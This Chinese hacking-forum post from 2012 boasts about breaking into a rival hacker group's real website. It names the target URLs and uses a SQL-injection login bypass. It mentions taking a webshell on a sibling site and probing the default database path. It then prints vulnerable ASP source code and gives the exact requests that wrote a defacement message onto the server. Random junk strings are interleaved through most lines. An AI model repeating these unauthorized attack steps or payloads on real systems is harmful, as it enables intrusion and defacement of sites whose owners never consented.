中国网络渗透测试联盟

标题: 入侵华东黑客联盟装X的过程 [打印本页]

作者: admin    时间: 2012-11-6 21:06
标题: 入侵华东黑客联盟装X的过程
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量
8 F% H; t) Q4 D4 M( s今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程6 L  b3 x) u2 _7 F1 e3 V, t
这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来+ J! x: W8 p" V) f! z
我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东+ V( r, g* W4 g3 L! o% j
首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的
. |/ h  a# P: X, F服务器应该防ARP,不过这还只是猜测
5 [& ~  ~# n  W云中鸡说先不搞C段,PZ一下再说
+ M% H2 F% o0 X7 n, w, C% o& V然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]
+ q3 e& z) n, L0 v7 ?一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............
! z- J: t9 c# `6 I* b8 N! j这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell
+ p" |0 w& k' _+ t- z6 j我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT) s7 l+ H, a# c) w! o
然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn
; P* ]. w9 P! R( T看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟6 y; Z: G3 S8 u  o& p
问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............( D4 c3 ~6 @7 ]2 V, e+ d
无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~
4 h  s0 X7 X' ?% G( K然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么7 m8 J, B- s( P- m2 z; X
打开一看,如图1所示。
1 r8 C/ |4 t* v! b/ \- B9 C
  ^& @( ~! @1 H http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg" V! o3 N$ [8 a6 W2 l; b
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
/ [: \/ ]/ S7 L" T8 P* A. \& A- q- V# H$ }  c4 f  Z
http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg8 a7 u- q! o5 E+ U  u4 P
太帅了,真YD!!
% U, |: v4 M- ^  R9 l# k7 y这个页面应该是一套个人主页程序,而且还挺炫的!: E2 R  m0 J) ?
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
0 V9 v0 y0 k( z
8 I$ S( I5 z- P http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg' s8 R# B, L4 T, L: A
嘿嘿,试着'or'='or'居然进去了!!如图4所示。
1 P0 g- D2 K2 g3 d6 J' @7 X; b7 ?0 u
$ o3 J. O8 {! K8 f: o http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg/ R; h' C4 n+ H. r  V
经过半个多小时的摸索,还是没有发现可利用的地方。
  p* |& C( _' h, W+ A9 o这下郁闷了,不管了,把这套程序下载下来看看吧5 d9 p. S3 m# @( U' a! l. ?& u( {
找了一会才知道这套程序叫做“V时代个人flash主页”% A  H) M4 R* k2 W: ?1 {: C+ b
到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用
9 M* X" ]+ O! `2 ]* _3 s" E于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]  ~1 I: _2 M) I1 I1 r& y
返回的确实找不到页面,郁闷了,输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]9 P4 o& i9 K3 X0 d1 i. g
同样是找不到页面,真晕!再看看!6 d$ d2 w; v2 V
5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!
. M! O* R  x' z. _$ |  e$ q马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!
& |; g/ Z: K4 N% _7 f% @& l6 }9 z) ^打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!( h* S0 _& u; f* `, g3 F' X' Q
希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:
5 l$ s3 s. U" M  q) f- ^
& Z# ^. T) V) Zvar a+ U+ V2 c4 s# P, E- Y4 Z
var b
* b, S/ _. ^  z* y  q. M( B: h; L( uvar tx5 U0 H) t# T& N
var clean$ u5 Z7 S7 q" ^5 k- a& C. B0 L
a=Request("re")
- {& s" L8 ?* c4 _8 V& sclean=Request("clean"), g0 f- g7 }$ }
var jian="test.txt"( X9 x) J0 o1 H$ d9 S6 c6 |
5 f1 m2 H7 c" T. F# k2 u9 r8 a
if(clean==1){
, B- e) a1 A6 _3 M9 L" j6 F% ~tx="&a="
: Q8 R* ?5 ^9 p- v- Wvar fs2
5 m' h5 S8 M/ u: \6 W5 y# |. Qvar fs2=Server.CreateObject("Scripting.FileSystemObject")* b% a4 v8 c; J& |) |% i! Y
var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)$ e  C& y1 k: Z3 L4 S3 n! Q4 V2 v
newdt.WriteLine("&a=")
& a% j8 N3 R+ R: J" r6 I! `) E. wnewdt.close()# N5 u1 Y! G" _9 u& X
}
! e9 O* W& o$ t0 P1 S- |* Z, t2 e2 d% R
if(clean==0|clean==1){' ^" {7 q3 L$ P7 D: C1 R# C
tx=""" G) a* ^+ r3 \: @9 S
var fso = Server.Createobject("Scripting.FileSystemObject")
9 i9 P) F0 v, u$ t- {var file = fso.OpenTextFile(Server.Mappath(jian))
/ T/ a9 z4 y/ \6 {while (!file.AtEndOfStream){, c! S, z1 R# Z
tx=file.ReadLine()- W" u) `; p8 v- M+ U
Response.write (tx)1 X4 J' q0 s# L7 d: C( W
}* X# f: h/ Z' \& ~' j* x& y
Response.write ("&")
$ w0 h: |- c! O/ D9 Z6 q' |" N" yfile.close()  @4 c0 s7 q* L, [8 L) x" L
}
3 ]  R* f( g$ x6 C' M' c! {
; g0 `) g# f8 f5 c, m6 M& iif(clean==2){0 x% a  d+ j: @# D* J
tx=""0 [* h* P4 i' U; e  V1 l1 d
var fso = Server.Createobject("Scripting.FileSystemObject")/ c  p1 Y+ R( H. ~
var file = fso.OpenTextFile(Server.Mappath(jian))! C& E) ]" i+ K2 W5 u& B( ?
& [* Z( {$ v1 c3 e0 j4 J
var fs2, L- K% o* q/ m9 z6 q, B) W5 M
var fs2=Server.CreateObject("Scripting.FileSystemObject")  r# C- Y1 [# o& K' U) l
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)8 V+ j$ d/ \! C8 f9 k, H& S% V

/ J, }( x4 C8 l0 }8 D+ J7 Z$ N% l6 D, E6 U
while (!file.AtEndOfStream){, }# l3 T8 y. I* \* z
tx=file.ReadLine()& v* `3 f  l6 F* R
Response.write (tx)}
. O- s7 X5 ~( ]% G1 O0 z2 f) U; E6 h; N3 f- B
Response.write (a+"&")+ ]% X+ v3 \: A# j3 e( ?
newdt.WriteLine(a)
8 e) G+ ]) x) ?3 U9 A+ D- K% Q$ H2 y
file.close()! B; Q9 m, ]1 a
newdt.close()" {. {; Y) p2 t
}
( F/ C- m* e6 [  X1 [3 l
1 z5 d# Q1 Y% M* g: m2 t  ^9 L/ G8 D; z- v) R1 J, N" Z
复制代码
9 Z- H. ?- ~0 b; L8 F& R+ P4 I这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”
. w/ E+ V. y( `4 v$ w" M接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”
! H* p  d, f( ^2 M( `这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
: o4 q# V0 ]3 U7 a过程如图5、6所示。
0 g# |$ N4 H$ V$ C& N5 t+ ~9 ]' `- w4 S' ]9 u9 _; l  r# h1 E  j! }- h
http://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg' V6 f$ m/ y" N6 W0 G: T
  + U0 w+ Q% \8 X2 m$ u- W* A+ H
http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg  Y% W8 g, L) u) N4 Z; ]% A' _9 w
提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。
2 M* W: Z; |0 A6 V( `- T* T0 z1 M
  M2 c! g* e% T# W http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg
; L3 H" H% j4 H; f+ J这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的
# M3 C3 p5 I% ^+ E5 I如果jian是经过request取值的话,同样也能搞到shell。' v6 W$ F) M; |" t( i
这次只是装到了X,并没有拿到shell; v; }5 l4 z, i( W  z  r5 u( y% I4 X7 a
已经是凌晨了,跟云中J说了声就睡觉去鸟1 B7 W) A& j8 M0 Z
估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙
6 f% [1 ?9 I1 }就到这里吧,没技术含量,纯粹装X,高手们见笑了
* {9 j& t5 y; M! e另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己4 Y, Q# W$ J: P( q8 T; x6 A, M% M
自己学不到技术,却还在自欺欺人
8 u$ k% I1 M* O5 b不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
* x# @& [# S- e! K6 p
9 ~: e7 z! d" ?. |




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2